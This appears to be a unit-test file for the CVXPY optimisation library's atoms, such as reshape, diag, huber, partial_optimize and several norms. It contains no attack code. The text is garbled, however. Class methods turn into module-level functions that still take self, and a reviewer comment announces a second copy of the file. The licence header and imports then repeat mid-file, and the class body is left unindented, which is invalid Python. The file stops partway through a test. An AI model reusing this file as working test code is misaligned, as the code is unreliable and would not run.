        expr = cp.reshape(expr, (2, 2))
        self.assertEqual(expr.shape, (2, 2))
        # Sign and curvature of the argument carry through reshape.
        expr = cp.reshape(cp.square(self.x), (1, 2))
        self.assertEqual(expr.sign, s.NONNEG)
        self.assertEqual(expr.curvature, s.CONVEX)
        self.assertEqual(expr.shape, (1, 2))
        with self.assertRaises(Exception) as cm:
            cp.reshape(self.C, (5, 4))
        self.assertEqual(str(cm.exception),
                         "Invalid reshape dimensions (5, 4).")
        # Test C-style reshape.
        a = np.arange(10)
        A_np = np.reshape(a, (5, 2), order='C')
        A_cp = cp.reshape(a, (5, 2), order='C')
        self.assertItemsAlmostEqual(A_np, A_cp.value)
        X = cp.Variable((5, 2))
        prob = cp.Problem(cp.Minimize(0), [X == A_cp])
        prob.solve()
        self.assertItemsAlmostEqual(A_np, X.value)
        a_np = np.reshape(A_np, 10, order='C')
        a_cp = cp.reshape(A_cp, 10, order='C')
        self.assertItemsAlmostEqual(a_np, a_cp.value)
        x = cp.Variable(10)
        prob = cp.Problem(cp.Minimize(0), [x == a_cp])
        prob.solve()
        self.assertItemsAlmostEqual(a_np, x.value)
        # Test more complex C-style reshape: matrix to another matrix
        b = np.array([
            [0, 1, 2],
            [3, 4, 5],
            [6, 7, 8],
            [9, 10, 11],
        ])
        b_reshaped = b.reshape((2, 6), order='C')
        X = cp.Variable(b.shape)
        X_reshaped = cp.reshape(X, (2, 6), order='C')
        prob = cp.Problem(cp.Minimize(0), [X_reshaped == b_reshaped])
        prob.solve()
        self.assertItemsAlmostEqual(b_reshaped, X_reshaped.value)
        self.assertItemsAlmostEqual(b, X.value)
    def test_vec(self) -> None:
        """Test the vec atom.
        """
        expr = cp.vec(self.C)
        self.assertEqual(expr.sign, s.UNKNOWN)
        self.assertEqual(expr.curvature, s.AFFINE)
        self.assertEqual(expr.shape, (6,))
        expr = cp.vec(self.x)
        self.assertEqual(expr.shape, (2,))
        # Sign and curvature of the argument carry through vec.
        expr = cp.vec(cp.square(self.a))
        self.assertEqual(expr.sign, s.NONNEG)
        self.assertEqual(expr.curvature, s.CONVEX)
        self.assertEqual(expr.shape, (1,))
    def test_diag(self) -> None:
        """Test the diag atom.

        diag maps a vector to a diagonal matrix and a square matrix to
        its diagonal vector; non-square non-vector input is rejected.
        """
        expr = cp.diag(self.x)
        self.assertEqual(expr.sign, s.UNKNOWN)
        self.assertEqual(expr.curvature, s.AFFINE)
        self.assertEqual(expr.shape, (2, 2))
        expr = cp.diag(self.A)
        self.assertEqual(expr.sign, s.UNKNOWN)
        self.assertEqual(expr.curvature, s.AFFINE)
        self.assertEqual(expr.shape, (2,))
        expr = cp.diag(self.x.T)
        self.assertEqual(expr.sign, s.UNKNOWN)
        self.assertEqual(expr.curvature, s.AFFINE)
        self.assertEqual(expr.shape, (2, 2))
        psd_matrix = np.array([[1, -1], [-1, 1]])
        expr = cp.diag(psd_matrix)
        self.assertEqual(expr.sign, s.NONNEG)
        self.assertEqual(expr.curvature, s.CONSTANT)
        self.assertEqual(expr.shape, (2,))
        with self.assertRaises(Exception) as cm:
            cp.diag(self.C)
        self.assertEqual(str(cm.exception),
                         "Argument to diag must be a vector or square matrix.")
        # Test that diag is PSD
        w = np.array([1.0, 2.0])
        expr = cp.diag(w)
        self.assertTrue(expr.is_psd())
        expr = cp.diag(-w)
        self.assertTrue(expr.is_nsd())
        # Mixed-sign diagonal is neither PSD nor NSD.
        expr = cp.diag(np.array([1, -1]))
        self.assertFalse(expr.is_psd())
        self.assertFalse(expr.is_nsd())
    def test_trace(self) -> None:
        """Test the trace atom.
        """
        expr = cp.trace(self.A)
        self.assertEqual(expr.sign, s.UNKNOWN)
        self.assertEqual(expr.curvature, s.AFFINE)
        self.assertEqual(expr.shape, tuple())
        # trace rejects non-square matrices.
        with self.assertRaises(Exception) as cm:
            cp.trace(self.C)
        self.assertEqual(str(cm.exception),
                         "Argument to trace must be a square matrix.")
    def test_log1p(self) -> None:
        """Test the log1p atom.
        """
        expr = cp.log1p(1)
        self.assertEqual(expr.sign, s.NONNEG)
        self.assertEqual(expr.curvature, s.CONSTANT)
        self.assertEqual(expr.shape, tuple())
        # log1p of a value in (-1, 0) is negative.
        expr = cp.log1p(-0.5)
        self.assertEqual(expr.sign, s.NONPOS)
    def test_upper_tri(self) -> None:
        """Test that upper_tri rejects non-square matrices."""
        with self.assertRaises(Exception) as cm:
            cp.upper_tri(self.C)
        self.assertEqual(str(cm.exception),
                         "Argument to upper_tri must be a square matrix.")
    def test_vec_to_upper_tri(self) -> None:
        """Test vec_to_upper_tri: packing a vector into the (strictly)
        upper-triangular part of a matrix, row by row."""
        from cvxpy.atoms.affine.upper_tri import vec_to_upper_tri
        x = Variable(shape=(3,))
        X = vec_to_upper_tri(x)
        x.value = np.array([1, 2, 3])
        actual = X.value
        expect = np.array([[1, 2], [0, 3]])
        assert np.allclose(actual, expect)
        # strict=True excludes the diagonal.
        y = Variable(shape=(1,))
        y.value = np.array([4])
        Y = vec_to_upper_tri(y, strict=True)
        actual = Y.value
        expect = np.array([[0, 4], [0, 0]])
        assert np.allclose(actual, expect)
        A_expect = np.array([[0, 11, 12, 13],
                             [0, 0, 16, 17],
                             [0, 0, 0, 21],
                             [0, 0, 0, 0]])
        a = np.array([11, 12, 13, 16, 17, 21])
        A_actual = vec_to_upper_tri(a, strict=True).value
        assert np.allclose(A_actual, A_expect)
    def test_huber(self) -> None:
        """Test the huber atom: M validation, Parameter M, and copy()."""
        # Valid.
        cp.huber(self.x, 1)
        with self.assertRaises(Exception) as cm:
            cp.huber(self.x, -1)
        self.assertEqual(str(cm.exception),
                         "M must be a non-negative scalar constant.")
        with self.assertRaises(Exception) as cm:
            cp.huber(self.x, [1, 1])
        self.assertEqual(str(cm.exception),
                         "M must be a non-negative scalar constant.")
        # M parameter.
        M = Parameter(nonneg=True)
        # Valid.
        cp.huber(self.x, M)
        M.value = 1
        # huber(2, 1) = 2*1*|2| - 1^2 = 3 in the quadratic-to-linear regime.
        self.assertAlmostEqual(cp.huber(2, M).value, 3)
        # Invalid.
        M = Parameter(nonpos=True)
        with self.assertRaises(Exception) as cm:
            cp.huber(self.x, M)
        self.assertEqual(str(cm.exception),
                         "M must be a non-negative scalar constant.")
        # Test copy with args=None
        atom = cp.huber(self.x, 2)
        copy = atom.copy()
        self.assertTrue(type(copy) is type(atom))
        # A new object is constructed, so copy.args == atom.args but copy.args
        # is not atom.args.
        self.assertEqual(copy.args, atom.args)
        self.assertFalse(copy.args is atom.args)
        # As get_data() returns a Constant, we have to check the value
        self.assertEqual(copy.get_data()[0].value, atom.get_data()[0].value)
        # Test copy with new args
        copy = atom.copy(args=[self.y])
        self.assertTrue(type(copy) is type(atom))
        self.assertTrue(copy.args[0] is self.y)
        self.assertEqual(copy.get_data()[0].value, atom.get_data()[0].value)
    def test_sum_largest(self) -> None:
        """Test the sum_largest atom and related atoms.
        """
        with self.assertRaises(Exception) as cm:
            cp.sum_largest(self.x, -1)
        self.assertEqual(str(cm.exception),
                         "Second argument must be a positive integer.")
        with self.assertRaises(Exception) as cm:
            cp.lambda_sum_largest(self.x, 2.4)
        self.assertEqual(str(cm.exception),
                         "First argument must be a square matrix.")
        with self.assertRaises(Exception) as cm:
            cp.lambda_sum_largest(Variable((2, 2)), 2.4)
        self.assertEqual(str(cm.exception),
                         "Second argument must be a positive integer.")
        # Eigenvalue sums require a Hermitian/symmetric argument.
        with self.assertRaises(ValueError) as cm:
            cp.lambda_sum_largest([[1, 2], [3, 4]], 2).value
        self.assertEqual(str(cm.exception),
                         "Input matrix was not Hermitian/symmetric.")
        # Test copy with args=None
        atom = cp.sum_largest(self.x, 2)
        copy = atom.copy()
        self.assertTrue(type(copy) is type(atom))
        # A new object is constructed, so copy.args == atom.args but copy.args
        # is not atom.args.
        self.assertEqual(copy.args, atom.args)
        self.assertFalse(copy.args is atom.args)
        self.assertEqual(copy.get_data(), atom.get_data())
        # Test copy with new args
        copy = atom.copy(args=[self.y])
        self.assertTrue(type(copy) is type(atom))
        self.assertTrue(copy.args[0] is self.y)
        self.assertEqual(copy.get_data(), atom.get_data())
        # Test copy with lambda_sum_largest, which is in fact an AddExpression
        atom = cp.lambda_sum_largest(Variable((2, 2)), 2)
        copy = atom.copy()
        self.assertTrue(type(copy) is type(atom))
    def test_sum_smallest(self) -> None:
        """Test the sum_smallest atom and related atoms.
        """
        with self.assertRaises(Exception) as cm:
            cp.sum_smallest(self.x, -1)
        self.assertEqual(str(cm.exception),
                         "Second argument must be a positive integer.")
        with self.assertRaises(Exception) as cm:
            cp.lambda_sum_smallest(Variable((2, 2)), 2.4)
        self.assertEqual(str(cm.exception),
                         "Second argument must be a positive integer.")
    def test_index(self) -> None:
        """Test the copy function for index.
        """
        # Test copy with args=None
        shape = (5, 4)
        A = Variable(shape)
        atom = A[0:2, 0:1]
        copy = atom.copy()
        self.assertTrue(type(copy) is type(atom))
        # A new object is constructed, so copy.args == atom.args but copy.args
        # is not atom.args.
        self.assertEqual(copy.args, atom.args)
        self.assertFalse(copy.args is atom.args)
        self.assertEqual(copy.get_data(), atom.get_data())
        # Test copy with new args
        B = Variable((4, 5))
        copy = atom.copy(args=[B])
        self.assertTrue(type(copy) is type(atom))
        self.assertTrue(copy.args[0] is B)
        self.assertEqual(copy.get_data(), atom.get_data())
def test_bmat(self) -> None:
    """Test the bmat atom.

    The previous version built ``expr`` with numpy's vstack/hstack and so
    compared a numpy array against an identically-built numpy array — it
    never exercised ``cp.bmat`` at all. Build the block matrix with
    ``cp.bmat`` and compare its value against the numpy reference.
    """
    v_np = np.ones((3, 1))
    # Block layout: [[v, v], [0, [1, 2]^T]] -> a (5, 2) matrix.
    expr = cp.bmat([[v_np, v_np],
                    [np.zeros((2, 1)), np.array([[1, 2]]).T]])
    self.assertEqual(expr.shape, (5, 2))
    # Reference value assembled directly with numpy.
    const = np.vstack([np.hstack([v_np, v_np]),
                       np.hstack([np.zeros((2, 1)),
                                  np.array([[1, 2]]).T])])
    self.assertItemsAlmostEqual(expr.value, const)
def test_conv(self) -> None:
    """Test the conv atom.

    Checks sign propagation through a nonneg/nonpos parameter kernel,
    the output shape, and the input-validation errors.
    """
    a = np.ones((3, 1))
    # Nonnegative constant convolved with a nonneg parameter stays nonneg.
    b = Parameter(2, nonneg=True)
    expr = cp.conv(a, b)
    assert expr.is_nonneg()
    # Length-3 signal (*) length-2 kernel -> length-4 result.
    self.assertEqual(expr.shape, (4, 1))
    # With a nonpos kernel the result is nonpos.
    b = Parameter(2, nonpos=True)
    expr = cp.conv(a, b)
    assert expr.is_nonpos()
    # First argument must be constant.
    with self.assertRaises(Exception) as cm:
        cp.conv(self.x, -1)
    self.assertEqual(str(cm.exception),
                     "The first argument to conv must be constant.")
    # Both arguments must resolve to vectors.
    with self.assertRaises(Exception) as cm:
        cp.conv([[0, 1], [0, 1]], self.x)
    self.assertEqual(str(cm.exception),
                     "The arguments to conv must resolve to vectors.")
def test_kron(self) -> None:
    """Test the kron atom.

    Checks sign propagation, the Kronecker-product shape, and the
    constant-first-argument validation error.
    """
    a = np.ones((3, 2))
    # Nonneg constant (x) nonneg parameter -> nonneg.
    b = Parameter((2, 1), nonneg=True)
    expr = cp.kron(a, b)
    assert expr.is_nonneg()
    # (3, 2) kron (2, 1) -> (6, 2).
    self.assertEqual(expr.shape, (6, 2))
    # Nonneg constant (x) nonpos parameter -> nonpos.
    b = Parameter((2, 1), nonpos=True)
    expr = cp.kron(a, b)
    assert expr.is_nonpos()
    with self.assertRaises(Exception) as cm:
        cp.kron(self.x, -1)
    self.assertEqual(str(cm.exception),
                     "The first argument to kron must be constant.")
def test_partial_optimize_dcp(self) -> None:
    """Test DCP properties of partial optimize.
    """
    # Evaluate the 1-norm in the usual way (i.e., in epigraph form).
    dims = 3
    x, t = Variable(dims), Variable(dims)
    # Minimizing a convex objective over t yields a convex function of x.
    p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
    g = partial_optimize(p2, [t], [x])
    self.assertEqual(g.curvature, s.CONVEX)
    # Maximizing a concave objective over t yields a concave function of x.
    p2 = Problem(cp.Maximize(cp.sum(t)), [-t <= x, x <= t])
    g = partial_optimize(p2, [t], [x])
    self.assertEqual(g.curvature, s.CONCAVE)
    # Maximizing a convex objective is not DCP: neither convex nor concave.
    p2 = Problem(cp.Maximize(cp.square(t[0])), [-t <= x, x <= t])
    g = partial_optimize(p2, [t], [x])
    self.assertEqual(g.is_convex(), False)
    self.assertEqual(g.is_concave(), False)
def test_partial_optimize_eval_1norm(self) -> None:
    """Test the partial_optimize atom.

    Minimizes the 1-norm both directly (epigraph form) and via
    partial_optimize with several equivalent argument conventions,
    and checks the argument-validation errors.
    """
    # Evaluate the 1-norm in the usual way (i.e., in epigraph form).
    dims = 3
    x, t = Variable(dims), Variable(dims)
    xval = [-5]*dims
    p1 = Problem(cp.Minimize(cp.sum(t)), [-t <= xval, xval <= t])
    p1.solve()
    # Minimize the 1-norm via partial_optimize.
    p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
    g = partial_optimize(p2, [t], [x])
    p3 = Problem(cp.Minimize(g), [x == xval])
    p3.solve()
    self.assertAlmostEqual(p1.value, p3.value)
    # Minimize the 1-norm using maximize.
    p2 = Problem(cp.Maximize(cp.sum(-t)), [-t <= x, x <= t])
    g = partial_optimize(p2, opt_vars=[t])
    p3 = Problem(cp.Maximize(g), [x == xval])
    p3.solve()
    # The maximized value is the negated minimum.
    self.assertAlmostEqual(p1.value, -p3.value)
    # Try leaving out args.
    # Minimize the 1-norm via partial_optimize.
    p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
    g = partial_optimize(p2, opt_vars=[t])
    p3 = Problem(cp.Minimize(g), [x == xval])
    p3.solve()
    self.assertAlmostEqual(p1.value, p3.value)
    # Minimize the 1-norm via partial_optimize.
    g = partial_optimize(p2, dont_opt_vars=[x])
    p3 = Problem(cp.Minimize(g), [x == xval])
    p3.solve()
    self.assertAlmostEqual(p1.value, p3.value)
    # Specifying neither variable list is an error.
    with self.assertRaises(Exception) as cm:
        g = partial_optimize(p2)
    self.assertEqual(str(cm.exception),
                     "partial_optimize called with neither opt_vars nor dont_opt_vars.")
    # If both lists are given they must jointly cover all problem variables.
    with self.assertRaises(Exception) as cm:
        g = partial_optimize(p2, [], [x])
    self.assertEqual(str(cm.exception),
                     ("If opt_vars and new_opt_vars are both specified, "
                      "they must contain all variables in the problem.")
                     )
def test_partial_optimize_min_1norm(self) -> None:
    """Minimizing the partially-optimized expression matches the full problem."""
    # Minimize the 1-norm in the usual way
    dims = 3
    x, t = Variable(dims), Variable(dims)
    p1 = Problem(Minimize(cp.sum(t)), [-t <= x, x <= t])
    # Minimize the 1-norm via partial_optimize
    g = partial_optimize(p1, [t], [x])
    p2 = Problem(Minimize(g))
    p2.solve()
    p1.solve()
    self.assertAlmostEqual(p1.value, p2.value)
def test_partial_optimize_simple_problem(self) -> None:
    """A two-stage LP solved via partial_optimize matches the combined LP."""
    x, y = Variable(1), Variable(1)
    # Solve the (simple) two-stage problem by "combining" the two stages
    # (i.e., by solving a single linear program)
    p1 = Problem(Minimize(x+y), [x+y >= 3, y >= 4, x >= 5])
    p1.solve()
    # Solve the two-stage problem via partial_optimize
    p2 = Problem(Minimize(y), [x+y >= 3, y >= 4])
    g = partial_optimize(p2, [y], [x])
    p3 = Problem(Minimize(x+g), [x >= 5])
    p3.solve()
    self.assertAlmostEqual(p1.value, p3.value)
@unittest.skipUnless(len(INSTALLED_MI_SOLVERS) > 0, 'No mixed-integer solver is installed.')
def test_partial_optimize_special_var(self) -> None:
    """partial_optimize with boolean/integer variables (needs an MI solver)."""
    x, y = Variable(boolean=True), Variable(integer=True)
    # Solve the (simple) two-stage problem by "combining" the two stages
    # (i.e., by solving a single linear program)
    p1 = Problem(Minimize(x+y), [x+y >= 3, y >= 4, x >= 5])
    p1.solve(solver=cp.ECOS_BB)
    # Solve the two-stage problem via partial_optimize
    p2 = Problem(Minimize(y), [x+y >= 3, y >= 4])
    g = partial_optimize(p2, [y], [x])
    p3 = Problem(Minimize(x+g), [x >= 5])
    p3.solve(solver=cp.ECOS_BB)
    self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_special_constr(self) -> None:
    """partial_optimize with a nonlinear (exp) objective in the inner stage."""
    x, y = Variable(1), Variable(1)
    # Solve the (simple) two-stage problem by "combining" the two stages
    # (i.e., by solving a single linear program)
    p1 = Problem(Minimize(x + cp.exp(y)), [x+y >= 3, y >= 4, x >= 5])
    p1.solve()
    # Solve the two-stage problem via partial_optimize
    p2 = Problem(Minimize(cp.exp(y)), [x+y >= 3, y >= 4])
    g = partial_optimize(p2, [y], [x])
    p3 = Problem(Minimize(x+g), [x >= 5])
    p3.solve()
    self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_params(self) -> None:
    """Test partial optimize with parameters.

    The Parameter appears in constraints of both the combined and the
    two-stage formulations; the optimal values must agree.
    """
    x, y = Variable(1), Variable(1)
    gamma = Parameter()
    # Solve the (simple) two-stage problem by "combining" the two stages
    # (i.e., by solving a single linear program)
    p1 = Problem(Minimize(x+y), [x+y >= gamma, y >= 4, x >= 5])
    gamma.value = 3
    p1.solve()
    # Solve the two-stage problem via partial_optimize
    p2 = Problem(Minimize(y), [x+y >= gamma, y >= 4])
    g = partial_optimize(p2, [y], [x])
    p3 = Problem(Minimize(x+g), [x >= 5])
    p3.solve()
    self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_numeric_fn(self) -> None:
    """Numeric evaluation of partial_optimize.

    Evaluating ``g.value`` must not clobber externally assigned variable
    values or dual-variable values.
    """
    x, y = Variable(), Variable()
    xval = 4
    # Solve the (simple) two-stage problem by "combining" the two stages
    # (i.e., by solving a single linear program)
    p1 = Problem(Minimize(y), [xval+y >= 3])
    p1.solve()
    # Solve the two-stage problem via partial_optimize
    constr = [y >= -100]
    p2 = Problem(Minimize(y), [x+y >= 3] + constr)
    g = partial_optimize(p2, [y], [x])
    x.value = xval
    y.value = 42
    constr[0].dual_variables[0].value = 42
    result = g.value
    self.assertAlmostEqual(result, p1.value)
    # Externally assigned values survive the evaluation.
    self.assertAlmostEqual(y.value, 42)
    self.assertAlmostEqual(constr[0].dual_value, 42)
    # No variables optimized over: g.value reduces to the objective value.
    p2 = Problem(Minimize(y), [x+y >= 3])
    g = partial_optimize(p2, [], [x, y])
    x.value = xval
    y.value = 42
    p2.constraints[0].dual_variables[0].value = 42
    result = g.value
    self.assertAlmostEqual(result, y.value)
    self.assertAlmostEqual(y.value, 42)
    self.assertAlmostEqual(p2.constraints[0].dual_value, 42)
def test_partial_optimize_stacked(self) -> None:
    """Minimize the 1-norm in the usual way

    Also checks that partial_optimize can be nested: the outer
    partial_optimize wraps a problem whose objective is itself a
    partial_optimize expression.
    """
    dims = 3
    x = Variable(dims, name='x')
    t = Variable(dims, name='t')
    p1 = Problem(Minimize(cp.sum(t)), [-t <= x, x <= t])
    # Minimize the 1-norm via partial_optimize
    g = partial_optimize(p1, [t], [x])
    # Nested partial_optimize over the remaining variable x.
    g2 = partial_optimize(Problem(Minimize(g)), [x])
    p2 = Problem(Minimize(g2))
    p2.solve()
    p1.solve()
    self.assertAlmostEqual(p1.value, p2.value)
def test_nonnegative_variable(self) -> None:
    """Check that a Variable declared with nonneg=True solves correctly."""
    var = Variable(nonneg=True)
    problem = Problem(Minimize(5 + var), [var >= 3])
    problem.solve()
    # Optimum is at the lower bound var == 3, so the objective is 8.
    self.assertAlmostEqual(problem.value, 8)
    self.assertAlmostEqual(var.value, 3)
def test_mixed_norm(self) -> None:
    """Test mixed norm on an all-ones matrix."""
    Z = Variable((5, 5))
    constraints = [Z == np.ones((5, 5))]
    objective = Minimize(cp.mixed_norm(Z, "inf", 1))
    # Each row's inf-norm is 1; summing over the 5 rows gives 5.
    optimal = Problem(objective, constraints).solve()
    self.assertAlmostEqual(optimal, 5)
def test_mat_norms(self) -> None:
    """Test that norm1 and normInf match definition for matrices.

    Compares the solver's optimal value against the constant-expression
    value of the same norm. (Removed leftover debug ``print`` calls that
    cluttered the test output.)
    """
    A = np.array([[1, 2], [3, 4]])
    X = Variable((2, 2))
    # Matrix 1-norm (max column sum).
    obj = Minimize(cp.norm(X, 1))
    prob = cp.Problem(obj, [X == A])
    result = prob.solve()
    self.assertAlmostEqual(result, cp.norm(A, 1).value, places=3)
    # Matrix inf-norm (max row sum).
    obj = Minimize(cp.norm(X, np.inf))
    prob = cp.Problem(obj, [X == A])
    result = prob.solve()
    self.assertAlmostEqual(result, cp.norm(A, np.inf).value, places=3)
def test_indicator(self) -> None:
    """Indicator of [0, 1]: zero inside the set, +inf outside."""
    z = cp.Variable()
    ind = cp.transforms.indicator([0 <= z, z <= 1])
    z.value = .5
    self.assertEqual(ind.value, 0.0)
    z.value = 2
    self.assertEqual(ind.value, np.inf)
def test_log_det(self) -> None:
    """log_det must reject a non-symmetric input matrix."""
    non_symmetric = [[1, 2], [3, 4]]
    with self.assertRaises(ValueError) as cm:
        cp.log_det(non_symmetric).value
    self.assertEqual(str(cm.exception),
                     "Input matrix was not Hermitian/symmetric.")
def test_lambda_max(self) -> None:
    """lambda_max must reject a non-symmetric input matrix."""
    non_symmetric = [[1, 2], [3, 4]]
    with self.assertRaises(ValueError) as cm:
        cp.lambda_max(non_symmetric).value
    self.assertEqual(str(cm.exception),
                     "Input matrix was not Hermitian/symmetric.")
def test_diff(self) -> None:
    """Test the diff atom.

    cp.diff must agree with np.diff on output shape along both axes.
    """
    A = cp.Variable((20, 10))
    B = np.zeros((20, 10))
    self.assertEqual(cp.diff(A, axis=0).shape,
                     np.diff(B, axis=0).shape)
    self.assertEqual(cp.diff(A, axis=1).shape,
                     np.diff(B, axis=1).shape)
def test_log_normcdf(self) -> None:
    """log_normcdf is nonpositive and concave, and matches scipy numerically."""
    self.assertEqual(cp.log_normcdf(self.x).sign, s.NONPOS)
    self.assertEqual(cp.log_normcdf(self.x).curvature, s.CONCAVE)
    # Loose tolerance (delta=1e-2): values are only expected to agree
    # approximately with scipy's exact log-CDF.
    for x in range(-4, 5):
        self.assertAlmostEqual(
            np.log(scipy.stats.norm.cdf(x)),
            cp.log_normcdf(x).value,
            places=None,
            delta=1e-2,
        )
    # Use the atom inside a solved problem: a 2x2 variable pinned to 2
    # contributes 4 identical log_normcdf(2) terms.
    y = Variable((2, 2))
    obj = Minimize(cp.sum(-cp.log_normcdf(y)))
    prob = Problem(obj, [y == 2])
    result = prob.solve()
    self.assertAlmostEqual(
        -result, 4 * np.log(scipy.stats.norm.cdf(2)), places=None, delta=1e-2
    )
# --- NOTE(review): stray '|' removed; a second copy of this file's content follows below ---
"""
Copyright 2013 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cvxpy as cp
import cvxpy.settings as s
from cvxpy.transforms.partial_optimize import partial_optimize
from cvxpy.expressions.variable import Variable
from cvxpy.expressions.constants import Parameter, Constant
from cvxpy.reductions.solvers.defines import INSTALLED_MI_SOLVERS
import numpy as np
from cvxpy import Problem, Minimize
from cvxpy.tests.base_test import BaseTest
import unittest
import scipy.sparse as sp
import scipy.stats
class TestAtoms(BaseTest):
""" Unit tests for the atoms module. """
def setUp(self) -> None:
    """Create the scalar, vector, and matrix variables shared by the tests."""
    self.a = Variable(name='a')          # scalar
    self.x = Variable(2, name='x')       # 2-vector
    self.y = Variable(2, name='y')       # 2-vector
    self.A = Variable((2, 2), name='A')  # square matrix
    self.B = Variable((2, 2), name='B')  # square matrix
    self.C = Variable((3, 2), name='C')  # non-square matrix
def test_add_expr_copy(self) -> None:
    """Test the copy function for AddExpresion class.
    """
    atom = self.x + self.y
    copy = atom.copy()
    self.assertTrue(type(copy) is type(atom))
    # A new object is constructed, so copy.args == atom.args but copy.args
    # is not atom.args.
    self.assertEqual(copy.args, atom.args)
    self.assertFalse(copy.args is atom.args)
    self.assertEqual(copy.get_data(), atom.get_data())
    # Test copy with new args: both summands are replaced.
    copy = atom.copy(args=[self.A, self.B])
    self.assertTrue(type(copy) is type(atom))
    self.assertTrue(copy.args[0] is self.A)
    self.assertTrue(copy.args[1] is self.B)
    self.assertEqual(copy.get_data(), atom.get_data())
def test_norm_inf(self) -> None:
    """Test the norm_inf class.

    norm_inf of an affine expression is a scalar convex atom, and stays
    convex under composition with itself or its negation.
    """
    exp = self.x+self.y
    atom = cp.norm_inf(exp)
    # self.assertEqual(atom.name(), "norm_inf(x + y)")
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONVEX)
    assert atom.is_convex()
    assert (-atom).is_concave()
    self.assertEqual(cp.norm_inf(atom).curvature, s.CONVEX)
    self.assertEqual(cp.norm_inf(-atom).curvature, s.CONVEX)
def test_norm1(self) -> None:
    """norm1 yields a scalar convex atom, and stays convex under composition."""
    inner = self.x + self.y
    n1 = cp.norm1(inner)
    self.assertEqual(n1.shape, tuple())
    self.assertEqual(n1.curvature, s.CONVEX)
    # norm1 of a convex expression (or its negation) is still convex.
    self.assertEqual(cp.norm1(n1).curvature, s.CONVEX)
    self.assertEqual(cp.norm1(-n1).curvature, s.CONVEX)
def test_list_input(self) -> None:
    """Test that list input is rejected.

    NOTE(review): the parenthesized "expected" value below is a single
    implicitly concatenated string, so ``in`` performs a substring check
    rather than tuple membership — presumably the raised message equals
    the full string; verify, or use assertEqual for clarity.
    """
    with self.assertRaises(Exception) as cm:
        cp.max([cp.Variable(), 1])
    self.assertTrue(str(cm.exception) in (
        "The input must be a single CVXPY Expression, not a list. "
        "Combine Expressions using atoms such as bmat, hstack, and vstack."))
    with self.assertRaises(Exception) as cm:
        cp.norm([1, cp.Variable()])
    self.assertTrue(str(cm.exception) in (
        "The input must be a single CVXPY Expression, not a list. "
        "Combine Expressions using atoms such as bmat, hstack, and vstack."))
    x = cp.Variable()
    y = cp.Variable()
    with self.assertRaises(Exception) as cm:
        cp.norm([x, y]) <= 1
    self.assertTrue(str(cm.exception) in (
        "The input must be a single CVXPY Expression, not a list. "
        "Combine Expressions using atoms such as bmat, hstack, and vstack."))
def test_quad_form(self) -> None:
    """quad_form with a symmetric Parameter of unknown sign is not DCP."""
    P = Parameter((2, 2), symmetric=True)
    form = cp.quad_form(self.x, P)
    # Curvature cannot be determined without knowing the sign of P.
    self.assertFalse(form.is_dcp())
def test_power(self) -> None:
    """Test the power class.

    Checks shape, curvature, and sign of power(expr, p) across the
    representative p regimes, and the copy() behavior.
    """
    from fractions import Fraction
    for shape in [(1, 1), (3, 1), (2, 3)]:
        x = Variable(shape)
        y = Variable(shape)
        exp = x + y
        for p in 0, 1, 2, 3, 2.7, .67, -1, -2.3, Fraction(4, 5):
            atom = cp.power(exp, p)
            self.assertEqual(atom.shape, shape)
            # Curvature by exponent regime: p>1 or p<0 convex, p==1 affine,
            # p==0 constant, 0<p<1 concave.
            if p > 1 or p < 0:
                self.assertEqual(atom.curvature, s.CONVEX)
            elif p == 1:
                self.assertEqual(atom.curvature, s.AFFINE)
            elif p == 0:
                self.assertEqual(atom.curvature, s.CONSTANT)
            else:
                self.assertEqual(atom.curvature, s.CONCAVE)
            # For p != 1 the result is nonnegative.
            if p != 1:
                self.assertEqual(atom.sign, s.NONNEG)
            # Test copy with args=None
            copy = atom.copy()
            self.assertTrue(type(copy) is type(atom))
            # A new object is constructed, so copy.args == atom.args but copy.args
            # is not atom.args.
            self.assertEqual(copy.args, atom.args)
            self.assertFalse(copy.args is atom.args)
            self.assertEqual(copy.get_data(), atom.get_data())
            # Test copy with new args
            copy = atom.copy(args=[self.y])
            self.assertTrue(type(copy) is type(atom))
            self.assertTrue(copy.args[0] is self.y)
            self.assertEqual(copy.get_data(), atom.get_data())
    assert cp.power(-1, 2).value == 1
# Test the geo_mean class.
def test_geo_mean(self) -> None:
    """geo_mean is a scalar, concave, nonnegative atom; copy() preserves data."""
    atom = cp.geo_mean(self.x)
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONCAVE)
    self.assertEqual(atom.sign, s.NONNEG)
    # Test copy with args=None
    copy = atom.copy()
    self.assertTrue(type(copy) is type(atom))
    # A new object is constructed, so copy.args == atom.args but copy.args
    # is not atom.args.
    self.assertEqual(copy.args, atom.args)
    self.assertFalse(copy.args is atom.args)
    self.assertEqual(copy.get_data(), atom.get_data())
    # Test copy with new args
    copy = atom.copy(args=[self.y])
    self.assertTrue(type(copy) is type(atom))
    self.assertTrue(copy.args[0] is self.y)
    self.assertEqual(copy.get_data(), atom.get_data())
# Test the harmonic_mean class.
def test_harmonic_mean(self) -> None:
    """harmonic_mean is a scalar, concave, nonnegative atom."""
    hm = cp.harmonic_mean(self.x)
    self.assertEqual(hm.shape, tuple())
    self.assertEqual(hm.curvature, s.CONCAVE)
    self.assertEqual(hm.sign, s.NONNEG)
# Test the pnorm class.
def test_pnorm(self) -> None:
    """pnorm shape/curvature/sign across p regimes, plus copy() behavior.

    p >= 1 (including inf) gives a convex norm; p < 1 (including negative
    p) gives the concave generalized mean variant. All are nonnegative
    scalars for vector input.
    """
    # p >= 1: convex.
    atom = cp.pnorm(self.x, p=1.5)
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONVEX)
    self.assertEqual(atom.sign, s.NONNEG)
    atom = cp.pnorm(self.x, p=1)
    self.assertEqual(atom.shape, tuple())
